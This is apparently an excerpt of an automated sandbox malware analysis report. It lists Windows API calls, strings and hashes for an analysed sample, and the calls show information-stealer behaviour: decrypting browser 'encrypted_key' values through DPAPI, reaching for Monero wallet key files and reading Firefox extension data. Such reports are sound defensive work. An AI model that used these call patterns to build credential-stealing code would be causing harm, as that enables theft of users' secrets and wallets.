                                      • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                      • Instruction Fuzzy Hash: BC51C072601206AFEB299F94C941FBEB7A8FF06311F24412DE906876D2E731ED40DB90
                                      APIs
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A3A664
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                       • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocLocallstrcpy
                                      • String ID: @$v10$v20
                                      • API String ID: 2746078483-278772428
                                      • Opcode ID: 18461ae41d9cfeff4db3b95243f1be2123e78bfee88fceb3a25e0db161b6436b
                                      • Instruction ID: dc0e305ed2fd5f991f784d63928d4b4b722cc5f833c5aaa9994b1c1ba075361f
                                      • Opcode Fuzzy Hash: 18461ae41d9cfeff4db3b95243f1be2123e78bfee88fceb3a25e0db161b6436b
                                      • Instruction Fuzzy Hash: 96516A75A50218EFDB28EFA4CE96FED7775BFA0344F008118F90A9B291DB706A05CB51
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A51678,00A50D93), ref: 00A3F64C
                                      • lstrlen.KERNEL32(00000000), ref: 00A3F66B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 998311485-3310892237
                                      • Opcode ID: 17278be1eb6b6492d5456dd24b656850198dcd8068175d271283dd7357755709
                                      • Instruction ID: a2de120bc246f5e440aadd0f271aa19c6a99bd0d11d17f2b3f185125dc460ea7
                                      • Opcode Fuzzy Hash: 17278be1eb6b6492d5456dd24b656850198dcd8068175d271283dd7357755709
                                      • Instruction Fuzzy Hash: 7C514276D50108ABDB04FBA0DEA2DFD7379AFA4340F408568F91667191EE346A09CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen
                                      • String ID:
                                      • API String ID: 367037083-0
                                      • Opcode ID: 2798b5717395bb20661f3b718591b3b5eb20ba45dd4d3c2fb93a631ce130f56b
                                      • Instruction ID: a0a78ff0195942bf021c68a955c54062384b8b3dc085f2bad81f11a0059518a2
                                      • Opcode Fuzzy Hash: 2798b5717395bb20661f3b718591b3b5eb20ba45dd4d3c2fb93a631ce130f56b
                                      • Instruction Fuzzy Hash: 8B412E7AD00209ABDF04EFA4D955EEEB778BF94304F008418F51677291EB70AA09CFA1
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A3A489
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A23F
                                        • Part of subcall function 00A3A210: LocalAlloc.KERNEL32(00000040,?,?,?,00A34F3E,00000000,?), ref: 00A3A251
                                        • Part of subcall function 00A3A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A34F3E,00000000,00000000), ref: 00A3A27A
                                        • Part of subcall function 00A3A210: LocalFree.KERNEL32(?,?,?,?,00A34F3E,00000000,?), ref: 00A3A28F
                                        • Part of subcall function 00A3A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A3A2D4
                                        • Part of subcall function 00A3A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A3A2F3
                                        • Part of subcall function 00A3A2B0: LocalFree.KERNEL32(?), ref: 00A3A323
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                      • String ID: $"encrypted_key":"$DPAPI
                                      • API String ID: 2100535398-738592651
                                      • Opcode ID: 5c3c7209f09722e0d33a2d3c748b6facf3a4d7093e4be273584e33ec133117a9
                                      • Instruction ID: bfe868336dd9c13fd602450475f834e9c4106e6c8b9dd9b95b94f8b4b341feeb
                                      • Opcode Fuzzy Hash: 5c3c7209f09722e0d33a2d3c748b6facf3a4d7093e4be273584e33ec133117a9
                                      • Instruction Fuzzy Hash: 9D3130B6D00219ABCF04DBE4DD45AEFB7B8BBA8300F444558F945A7281E7319E05CBA2
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00A505BF), ref: 00A4885A
                                      • Process32First.KERNEL32(?,00000128), ref: 00A4886E
                                      • Process32Next.KERNEL32(?,00000128), ref: 00A48883
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • CloseHandle.KERNEL32(?), ref: 00A488F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1066202413-0
                                      • Opcode ID: e6d88ea949ecba9232bbaac730e2c6919e1ab4b58abdca816786172b3fd19043
                                      • Instruction ID: 27530e11036d3c559eca8d2c3bd62efa262e392b3f7cf51f5c531f7de46c0950
                                      • Opcode Fuzzy Hash: e6d88ea949ecba9232bbaac730e2c6919e1ab4b58abdca816786172b3fd19043
                                      • Instruction Fuzzy Hash: 25318B75941618ABDB24EF90DD51FEEB378FB94740F004199F10EA62A0DB306E44CFA1
                                      APIs
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AAFE13
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AAFE2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value___vcrt_
                                      • String ID:
                                      • API String ID: 1426506684-0
                                      • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction ID: 5e1a05d13f7424741e57a1a72b1e0ac9eb6451ccc6e2ad532b0def09d76c018f
                                      • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                      • Instruction Fuzzy Hash: 98018432209721EEF63827B45DD9AA73A99EB027B5734433AF516861F3EF514C419240
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A50DE8,00000000,?), ref: 00A47B40
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47B47
                                      • GetLocalTime.KERNEL32(?,?,?,?,?,00A50DE8,00000000,?), ref: 00A47B54
                                      • wsprintfA.USER32 ref: 00A47B83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: a80a7bc89388122257d191de5dfa1ddbe3602b097055afe82f71fd27a12c1260
                                      • Instruction ID: b2cbbb64e66114d0add70495e7214f327d8e91594af135f40660783499d2e326
                                      • Opcode Fuzzy Hash: a80a7bc89388122257d191de5dfa1ddbe3602b097055afe82f71fd27a12c1260
                                      • Instruction Fuzzy Hash: 21113CB2D08218ABCB14DFD9DD45BBEB7B8FB4CB11F10421AF609A6280D3795940C7B4
                                      APIs
                                      • CreateFileA.KERNEL32(00A43D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00A43D3E,?), ref: 00A4948C
                                      • GetFileSizeEx.KERNEL32(000000FF,00A43D3E), ref: 00A494A9
                                      • CloseHandle.KERNEL32(000000FF), ref: 00A494B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSize
                                      • String ID:
                                      • API String ID: 1378416451-0
                                      • Opcode ID: c2f6db9c465e3b6db10d0a053273d2642b183a1325e219422880fed818ca6f03
                                      • Instruction ID: 1f47cf89a3ca31ae3c9fcdd9cc5d13aef9ae0ca0d2e7c03424cb8226cd7b5869
                                      • Opcode Fuzzy Hash: c2f6db9c465e3b6db10d0a053273d2642b183a1325e219422880fed818ca6f03
                                      • Instruction Fuzzy Hash: 72F03C39E04308BBDB10DBB0EC49F9F77B9AB88710F10C654FA19EB2C0D674A6118B90
                                      APIs
                                      • __getptd.LIBCMT ref: 00A4CA7E
                                        • Part of subcall function 00A4C2A0: __amsg_exit.LIBCMT ref: 00A4C2B0
                                      • __getptd.LIBCMT ref: 00A4CA95
                                      • __amsg_exit.LIBCMT ref: 00A4CAA3
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00A4CAC7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 300741435-0
                                      • Opcode ID: 0fea8a67276ac3e3df9bf1fcf14a244d2c1779e4c4c85ca263a09efbf190970f
                                      • Instruction ID: b7a6550870d2c29c8b0b41bb1c21316a396b37b1d9a5ee9f17c810b60cdfaa25
                                      • Opcode Fuzzy Hash: 0fea8a67276ac3e3df9bf1fcf14a244d2c1779e4c4c85ca263a09efbf190970f
                                      • Instruction Fuzzy Hash: A3F02B3D9563149BD7A0FBF8490374E33A1BFC0771F100159F508561C3DBA458408B91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmp
